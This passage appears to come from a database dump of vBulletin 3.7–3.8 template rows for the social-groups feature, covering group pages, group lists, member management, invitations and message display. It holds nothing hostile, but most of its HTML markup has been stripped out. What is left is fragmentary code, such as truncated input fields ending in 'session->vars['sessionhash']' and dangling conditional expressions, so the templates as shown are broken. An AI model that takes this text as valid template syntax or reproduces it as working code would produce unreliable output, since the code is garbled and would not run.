    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[editicon]) ? (\"\r\n\".((!$icononly) ? (\"
    \") : (\"\")).\"\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \".(($icononly) ? (\"$vbphrase[create_group_icon]\") : (\"$vbphrase[edit_group_icon]\")).\"
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[current_group_icon]\r\n \r\n \r\n \".((!$groupiconurl) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n
    \r\n $vbphrase[no_group_icon]\r\n \r\n \\\"$vbphrase[current_group_icon]\\\"\r\n \r\n
    $vbphrase[group_icon_desc]
    \r\n \".(($show[\'deleteicon\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[custom_group_icon]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \".(($show[\'url_option\']) ? (\"\r\n $vbphrase[enter_url_to_image]\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'url_option\']) ? (\"$vbphrase[option_2_upload_image_from_computer]\") : (\"$vbphrase[upload_image_from_computer]\")).\"\r\n
    \r\n \r\n \r\n
    \r\n\r\n $maxnote\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $phrase\r\n \r\n $group[name]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[group_options]\r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[create_group_icon]$vbphrase[edit_group_icon]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[current_group_icon]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[no_group_icon]\r\n \r\n \"$vbphrase[current_group_icon]\"\r\n \r\n
    $vbphrase[group_icon_desc]
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[custom_group_icon]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \r\n $vbphrase[enter_url_to_image]\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n $vbphrase[option_2_upload_image_from_computer]$vbphrase[upload_image_from_computer]\r\n
    \r\n \r\n \r\n
    \r\n\r\n $maxnote\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1227096129, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'), (1587, -1, 'socialgroups_group', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n $socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'groupinfo\']) ? (\"\r\n
    \r\n
    \r\n \".(($groupoptions[\'join\'] OR $groupoptions[\'leave\']) ? (\"\r\n \r\n \".(($groupoptions[\'join\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=join&groupid=$group[groupid]\\\">$vbphrase[join_group]\r\n \") : (\"\r\n \".((!$group[\'membertype\'] AND $group[\'type\'] == \'inviteonly\') ? (\"\r\n $vbphrase[group_type_inviteonly]\r\n \") : (\"\")).\"\r\n \")).\"\r\n \".(($groupoptions[\'join\'] AND $groupoptions[\'leave\']) ? (\"\r\n  | \r\n \") : (\"\")).\"\r\n \".(($groupoptions[\'leave\']) ? (\"session->vars[\'sessionurl\'] . \"do=leave&groupid=$group[groupid]\\\">$groupoptions[leavephrase]\") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n \".(($group[membermoderated]) ? (\"$vbphrase[moderated_social_group]\") : (\"$vbphrase[social_group]\")).\"\r\n
    \r\n\r\n \r\n
    \r\n \".(($groupiconurl) ? (\"\r\n \\\"\\\"\r\n \") : (\"\")).\"\r\n

    $group[name]

    \r\n
    \" . construct_phrase(\"$vbphrase[group_maintained_by_x]\", \"$ownerlink\", \"$group[creatorusername]\") . \"
    \r\n \".(($group[\'description\']) ? (\"\r\n

    $group[description]

    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n \r\n
    \r\n session->vars[\'sessionurl\'] . \"do=viewmembers&groupid=$group[groupid]\\\">$vbphrase[view_all_members]\r\n \" . construct_phrase(\"$vbphrase[showing_x_of_y_members]\", \"$members_shown\", \"$group[members]\") . \"\r\n
    \r\n\r\n
    \r\n
      $short_member_list_bits
    \r\n
    \r\n\r\n \r\n \".(($show[\'pictures_block\']) ? (\"\r\n
    \r\n \r\n \".(($pictures_shown) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_x_of_y_pictures]\", \"$pictures_shown\", \"$group[picturecount]\") . \"\r\n \") : (\"\r\n $vbphrase[group_pictures]\r\n \")).\"\r\n
    \r\n
    \r\n \".(($picturebits) ? (\"\r\n $picturebits\r\n \") : (\"\r\n $vbphrase[no_pictures_added_group_yet]\r\n \".(($show[\'add_pictures_link\']) ? (\"session->vars[\'sessionurl\'] . \"do=addpictures&groupid=$group[groupid]\\\">$vbphrase[add_pictures_to_this_group]\") : (\"\")).\"\r\n \")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n

    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($show[\'groupdiscussions\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($messagebits OR $searchtext) ? (\"\r\n
    \r\n
    \r\n $vbphrase[search_discussions]\r\n  \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \".((!$show[\'groupinfo\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[social_group_discussions_in_x]\", \"$group[name]\") . \"\r\n \") : (\"\r\n $vbphrase[social_group_discussions]\r\n \")).\"\r\n
    $vbphrase[group_tools]
    \r\n\r\n \".(($messagebits) ? (\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n \") : (\"\")).\"\r\n \r\n \r\n $template_hook[group_discussionlist_start_col]\r\n \r\n \r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $template_hook[group_discussionlist_end_col]\r\n \r\n $messagebits\r\n
    \r\n \".(($messagetotal) ? (\"\r\n $vbphrase[group_created] $sortarrow[dateline]\r\n \".(($messagestart > 1) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_discussions_x_to_y_of_z]\", \"$messagestart\", \"$messageend\", \"$messagetotal\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[showing_discussions_x_of_y]\", \"$messageshown\", \"$messagetotal\") . \"\r\n \")).\"\r\n \") : (\"\")).\"\r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n \r\n
    \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav OR $show[\'postlink\']) ? (\"\r\n
    \r\n \".(($pagenav) ? (\"\r\n
    \r\n $pagenav\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \".(($show[popups]) ? (\"\r\n \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\r\n
    \r\n
    \r\n \".(($searchtext) ? (\"\r\n $vbphrase[no_discussions_found]\r\n \") : (\"\r\n $vbphrase[group_has_no_discussions]\r\n \")).\"\r\n
    \r\n
    \r\n \".(($show[\'postlink\']) ? (\"\") : (\"\")).\"\r\n\")).\"\r\n\r\n\".(($show[popups]) ? (\"\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n
    \r\n\r\n\")).\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".((!$group[\'canviewcontent\']) ? (\"\r\n
    \r\n
    \r\n $vbphrase[must_join_to_view]\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n \".(($show[\'groupoptions\']) ? (\"\r\n\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n $socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n $vbphrase[join_group]\r\n \r\n \r\n $vbphrase[group_type_inviteonly]\r\n \r\n \r\n \r\n  | \r\n \r\n $groupoptions[leavephrase]\r\n \r\n \r\n $vbphrase[moderated_social_group]$vbphrase[social_group]\r\n
    \r\n\r\n \r\n
    \r\n \r\n \"\"\r\n \r\n

    $group[name]

    \r\n
    $vbphrase[group_maintained_by_x]
    \r\n \r\n

    $group[description]

    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[view_all_members]\r\n $vbphrase[showing_x_of_y_members]\r\n
    \r\n\r\n
    \r\n
      $short_member_list_bits
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n \r\n \r\n $vbphrase[showing_x_of_y_pictures]\r\n \r\n $vbphrase[group_pictures]\r\n \r\n
    \r\n
    \r\n \r\n $picturebits\r\n \r\n $vbphrase[no_pictures_added_group_yet]\r\n $vbphrase[add_pictures_to_this_group]\r\n \r\n
    \r\n
    \r\n\r\n

    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[search_discussions]\r\n  \r\n \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n
    \r\n \r\n $vbphrase[social_group_discussions_in_x]\r\n \r\n $vbphrase[social_group_discussions]\r\n \r\n
    $vbphrase[group_tools]
    \r\n\r\n \r\n \r\n
    \r\n \r\n \r\n \r\n $template_hook[group_discussionlist_start_col]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n $template_hook[group_discussionlist_end_col]\r\n \r\n $messagebits\r\n
    \r\n \r\n $vbphrase[group_created] $sortarrow[dateline]\r\n 1\">\r\n $vbphrase[showing_discussions_x_to_y_of_z]\r\n \r\n $vbphrase[showing_discussions_x_of_y]\r\n \r\n \r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • \"\"
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n
    \r\n\r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n $vbphrase[no_discussions_found]\r\n \r\n $vbphrase[group_has_no_discussions]\r\n \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n \r\n
    $vbphrase[group_tools]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[must_join_to_view]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1234873522, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1588, -1, 'socialgroups_grouplist_bit', '\r\n \r\n \".(($group[iconurl]) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[category_names]) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$group[categoryid]\\\" style=\\\"font-weight:normal\\\">$group[categoryname]\r\n \") : (\"\")).\"\r\n \r\n\r\n
    $group[mediumdescription]
    \r\n\r\n \r\n session->vars[\'sessionurl\'] . \"do=viewmembers&groupid=$group[groupid]\\\">$group[members]\r\n \".(($show[\'gminfo\']) ? (\"\r\n $group[discussions]\r\n $group[visible]\r\n \") : (\"\")).\"\r\n \".(($show[\'pictureinfo\']) ? (\"\".(($group[\'picturecount\']) ? (\"session->vars[\'sessionurl\'] . \"do=grouppictures&groupid=$group[groupid]\\\">$group[picturecount]\") : (\"$group[picturecount]\")).\"\") : (\"\")).\"\r\n\r\n \".(($show[\'gminfo\']) ? (\"\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n
    \r\n $group[lastpostdate]\r\n \".((!$show[\'detailedtime\']) ? (\"\r\n
    $group[lastposttime]\r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\r\n
    \r\n $group[createdate]\r\n
    \r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n', '\r\n \r\n \r\n
    \r\n \r\n \"$group[shortdescription]\"\r\n \r\n
    \r\n
    \r\n \r\n $group[categoryname]\r\n \r\n \r\n\r\n
    $group[mediumdescription]
    \r\n\r\n \r\n $group[members]\r\n \r\n $group[discussions]\r\n $group[visible]\r\n \r\n $group[picturecount]$group[picturecount]\r\n\r\n \r\n \r\n \r\n
    \r\n $group[lastpostdate]\r\n \r\n
    $group[lastposttime]\r\n
    \r\n
    \r\n \r\n
    \r\n $group[createdate]\r\n
    \r\n
    \r\n \r\n
    \r\n', 'template', 1232979416, 'vBulletin Solutions', '3.8.1', 'vbulletin'), (1589, -1, 'socialgroups_groupmodlist_bit', '\r\n \r\n \r\n
    $group[shortdescription]
    \r\n \r\n \r\n $vbphrase[group_members]\r\n session->vars[\'sessionurl\'] . \"do=viewmembers&groupid=$group[groupid]\\\">$group[members]\r\n\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime]\r\n \") : (\"\")).\"\r\n
    \r\n \".(($group[\'lastposterid\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$group[lastposterid]\", \"$group[lastposter]\") . \"\r\n session->vars[\'sessionurl\'] . \"do=discuss&gmid=$group[lastgmid]#gmessage$group[lastgmid]\\\">\\\"$vbphrase[go_to_last_post]\\\"\r\n
    \r\n \") : (\"\")).\"\r\n \") : (\"\r\n
    \r\n
    \r\n $vbphrase[group_created]\r\n
    \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime]\r\n \") : (\"\")).\"\r\n
    \r\n \")).\"\r\n \r\n\r\n\r\n\r\n $vbphrase[messages]\r\n $group[visible]\r\n\r\n\".(($show[\'pictureinfo\']) ? (\"\r\n\r\n $vbphrase[pictures]\r\n \r\n \".(($group[\'picturecount\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=grouppictures&groupid=$group[groupid]\\\">$group[picturecount]\r\n \") : (\"\r\n $group[picturecount]\r\n \")).\"\r\n \r\n\r\n\") : (\"\")).\"', '\r\n 32
    \">\r\n \r\n
    $group[shortdescription]
    \r\n \r\n \r\n $vbphrase[group_members]\r\n $group[members]\r\n\r\n 32
    \">\r\n \r\n \r\n \r\n \r\n
    \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime]\r\n \r\n
    \r\n \r\n
    \r\n $vbphrase[by_x]\r\n \"$vbphrase[go_to_last_post]\"\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[group_created]\r\n
    \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime]\r\n \r\n
    \r\n
    \r\n \r\n\r\n\r\n\r\n $vbphrase[messages]\r\n $group[visible]\r\n\r\n\r\n\r\n $vbphrase[pictures]\r\n \r\n \r\n $group[picturecount]\r\n \r\n $group[picturecount]\r\n \r\n \r\n\r\n', 'template', 1214929083, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1590, -1, 'socialgroups_groupsub_bit', '\r\n \r\n \r\n
    $group[shortdescription]
    \r\n \r\n \r\n\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n \".(($group[\'lastposterid\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime]\r\n \") : (\"\")).\"\r\n
    \r\n \".(($group[\'lastposterid\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$group[lastposterid]\", \"$group[lastposter]\") . \"\r\n session->vars[\'sessionurl\'] . \"do=discuss&gmid=$group[lastgmid]#gmessage$group[lastgmid]\\\">\\\"$vbphrase[go_to_last_post]\\\"\r\n
    \r\n \") : (\"\")).\"\r\n \") : (\"\r\n
    \r\n
    \r\n $vbphrase[group_created]\r\n
    \r\n $group[lastpostdate] \r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime]\r\n \") : (\"\")).\"\r\n
    \r\n \")).\"\r\n \r\n \r\n \r\n $group[notification]\r\n \r\n \r\n \r\n \r\n \r\n', '\r\n \r\n \r\n
    $group[shortdescription]
    \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime]\r\n \r\n
    \r\n \r\n
    \r\n $vbphrase[by_x]\r\n \"$vbphrase[go_to_last_post]\"\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[group_created]\r\n
    \r\n $group[lastpostdate] \r\n \r\n $group[lastposttime]\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n $group[notification]\r\n \r\n \r\n \r\n \r\n \r\n', 'template', 1234873375, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1591, -1, 'socialgroups_manage', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[social_group]: session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name]\r\n \".(($show[\'manage_members\']) ? (\"\r\n $vbphrase[manage_members]\r\n \") : (\"\r\n $vbphrase[pending_and_invited_members]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n \".(($moderatebits) ? (\"\r\n
    \r\n $vbphrase[members_pending_moderation]\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=pendingmembers&groupid=$group[groupid]\\\" method=\\\"post\\\" id=\\\"moderatedlist_change_form\\\">\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[members_pending_moderation]
    \r\n
    $vbphrase[members_pending_moderation_description]:
    \r\n
      \r\n $moderatebits\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n\r\n\r\n
    \r\n $vbphrase[invited_users]\r\n \".(($invitebits) ? (\"\r\n
    session->vars[\'sessionurl\'] . \"do=pendingmembers&groupid=$group[groupid]\\\" method=\\\"post\\\" id=\\\"invitedlist_change_form\\\">\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[invited_members]
    \r\n
    $vbphrase[invited_users_description]:
    \r\n
      \r\n $invitebits\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n \".(($errormsg) ? (\"\r\n
    \\\"\\\" $errormsg
    \r\n \") : (\"\")).\"\r\n\r\n $vbphrase[invite_user]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[social_group]: $group[name]\r\n \r\n $vbphrase[manage_members]\r\n \r\n $vbphrase[pending_and_invited_members]\r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[members_pending_moderation]\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[members_pending_moderation]
    \r\n
    $vbphrase[members_pending_moderation_description]:
    \r\n
      \r\n $moderatebits\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n
    \r\n $vbphrase[invited_users]\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[invited_members]
    \r\n
    $vbphrase[invited_users_description]:
    \r\n
      \r\n $invitebits\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \r\n
    \"\" $errormsg
    \r\n
    \r\n\r\n $vbphrase[invite_user]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1208876251, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1592, -1, 'socialgroups_managebit', '
  • \r\n \r\n
    \r\n
  • \r\n', '
  • \r\n
    \r\n $user[username]\r\n
    \r\n
    \r\n
  • \r\n', 'template', 1200923125, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1593, -1, 'socialgroups_managemembers', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n\r\n \r\n\r\n\r\n $header\r\n $navbar\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name]$vbphrase[manage_members]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[manage_members]\r\n \".(($memberbits) ? (\"\r\n
    session->vars[\'sessionurl\'] . \"do=pendingmembers&groupid=$group[groupid]\\\" method=\\\"post\\\" id=\\\"memberlist_change_form\\\">\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[kick_members]
    \r\n
    $vbphrase[kick_members_description]:
    \r\n
      \r\n $memberbits\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n \") : (\"\r\n $vbphrase[last_member_of_group]\r\n \")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n$footer\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n $memberinfo_css\r\n $socialgroups_css\r\n \r\n\r\n \r\n\r\n\r\n $header\r\n $navbar\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $group[name]$vbphrase[manage_members]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[manage_members]\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n
    \r\n
    $vbphrase[kick_members]
    \r\n
    $vbphrase[kick_members_description]:
    \r\n
      \r\n $memberbits\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n \r\n $vbphrase[last_member_of_group]\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n$footer\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1211192623, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1594, -1, 'socialgroups_memberlist', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n $memberinfo_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[members_in_group_x]\", \"$group[name]\") . \"\r\n
    \r\n
      $member_list
    \r\n
    \r\n\".(($pagenav) ? (\"\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n $memberinfo_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[members_in_group_x]\r\n
    \r\n
      $member_list
    \r\n
    \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1195748117, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1595, -1, 'socialgroups_message', '
    \r\n \".(($message[\'goto\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($message[\'avatarurl\']) ? (\"\r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"
    \") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n \r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
